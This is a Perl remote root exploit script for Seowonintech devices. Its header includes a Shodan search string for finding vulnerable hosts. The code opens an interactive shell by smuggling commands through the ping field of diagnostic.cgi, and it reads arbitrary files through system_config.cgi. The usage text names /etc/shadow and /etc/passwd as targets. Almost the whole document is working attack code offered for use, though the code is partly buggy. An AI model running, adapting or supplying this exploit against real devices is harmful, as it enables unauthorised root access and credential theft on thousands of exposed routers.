#!/usr/bin/perl
#
# [+] Seowonintech all device remote root exploit v2
# =====================================================
# author: | email:
# Todor Donev (latin) | todor dot donev
# Òîäîð Äîíåâ (cyrillic) | @googlemail.com
# =====================================================
# type: | platform: | description:
# remote | linux | attacker can get root
# hardware | seowonintech | access on the device
# =====================================================
# greetings to:
# Stiliyan Angelov,Tsvetelina Emirska,all elite
# colleagues and all my friends that support me.
# =====================================================
# warning:
# Results about 37665 possible vulnerabilities
# from this exploit.
# =====================================================
# shodanhq dork:
# thttpd/2.25b 29dec2003 Content-Length: 386 Date: 2013
# =====================================================
# P.S. Sorry for buggy perl.. :)
# 2o13 Hell yeah from Bulgaria, Sofia
#
# Stop Monsanto Stop Monsanto Stop Monsanto
#
# FREE GOTTFRID SVARTHOLM WARG FREE
# GOTTFRID SVARTHOLM WARG is THEPIRATEBAY co-founder
# who was sentenced to two years in jail by Nacka
# district court, Sweden on 18.06.2013 for hacking into
# computers at a company that manages data for Swedish
# authorities and making illegal online money transfers.
use
LWP::Simple qw/
$ua
get/;
if
(not
defined
$ARGV
[0])
{
usg();
exit
;
}
print
"[+] Seowonintech all device remote root exploit\n"
;
$diagcheck
=
$host
.
"/cgi-bin/diagnostic.cgi"
;
$syscheck
=
$host
.
"/cgi-bin/system_config.cgi"
;
$res
=
$ua
->get(
$diagcheck
) ||
die
"[-] Error: $!\n"
;
print
"[+] Checking before attack..\n"
;
if
(
$res
->status_line != 200){
print
"[+] diagnostic.cgi Status: "
.
$res
->status_line.
"\n"
;
}
else
{
print
"[o] Victim is ready for attack.\n"
;
print
"[o] Status: "
.
$res
->status_line.
"\n"
;
if
(
defined
$res
=~ m{selected>4</option>}sx){
print
"[+] Connected to $ARGV[0]\n"
;
print
"[+] The fight for the future Begins\n"
;
print
"[+] Exploiting via remote command execution..\n"
;
print
"[+] Permission granted, old friend.\n"
;
&rce;
}
else
{
print
"[!] Warning: possible vulnerability.\n"
;
exit
;
}
}
$res1
=
$ua
->get(
$syscheck
) ||
die
"[-] Error: $!\n"
;
if
(
$res1
->status_line != 200){
print
"[+] system_config.cgi Status: "
.
$res1
->status_line.
"\n"
;
exit
;
}
else
{
print
"[+] Trying to attack via remote file disclosure release.\n"
;
if
(
defined
$syscheck
=~ s/value=\'\/etc\/\'//gs){
print
"[+] Victim is ready for attack.\n"
;
print
"[+] Connected to $ARGV[0]\n"
;
print
"[o] Follow the white cat.\n"
;
print
"[+] Exploiting via remote file dislocure..\n"
;
print
"[+] You feeling lucky, Neo?\n"
;
&rfd;
}
else
{
print
"[!] Warning: Possible vulnerability. Believe the unbelievable!\n"
;
exit
;
}
}
sub
rfd{
while
(1){
print
"# cat "
;
chomp
(
$file
=<STDIN>);
if
(
$file
eq
""
){
print
"Enter full path to file!\n"
; }
$bug
=
$host
.
"/cgi-bin/system_config.cgi?file_name="
.
$file
.
"&btn_type=load&action=APPLY"
;
$data
=get(
$bug
) ||
die
"[-] Error: $ARGV[0] $!\n"
;
$data
=~ s/Null/File not found!/gs;
if
(
defined
$data
=~ m{rows=
"30"
>(.*?)</textarea>}sx){
print
$1
.
"\n"
;
}
}
}
sub
rce{
while
(1){
print
"# "
;
chomp
(
$rce
=<STDIN>);
$bug
=
$host
.
"/cgi-bin/diagnostic.cgi?select_mode_ping=on&ping_ipaddr=-q -s 0 127.0.0.1;"
.
$rce
.
";&ping_count=1&action=Apply&html_view=ping"
;
$rce
=~ s/\|/\;/;
if
(
$rce
eq
""
){
print
"enter Linux command\n"
;}
if
(
$rce
eq
"clear"
){
system
$^O eq
'MSWin32'
?
'cls'
:
'clear'
;}
if
(
$rce
eq
"exit"
||
$rce
eq
"quit"
){
print
"There is no spoon...\n"
;
exit
;}
$data
=get(
$bug
) ||
die
"[-] Error: $!\n"
;
if
(
defined
$data
=~ m{(\s.*) Content-type:}sx){
$result
=
substr
$1
,
index
(
$1
,
' loss'
) or
substr
$1
,
index
(
$1
,
' ms'
);
$result
=~ s/ loss\n//;
$result
=~ s/ ms\n//;
print
$result
;
}
}
}
sub
usg
{
print
" [+] Seowonintech all device remote root exploit\n"
;
print
" [!] by Todor Donev todor dot donev @ googlemail.com\n"
;
print
" [?] usg: perl $0 <victim>\n"
;
print
" [?] exmp xpl USG: perl $0 192.168.1.1 :)\n"
;
print
" [1] exmp xpl RCE: # uname -a :)\n"
;
print
" [2] exmp xpl RFD: # cat /etc/webpasswd or /etc/shadow, maybe and /etc/passwd :P\n"
;
}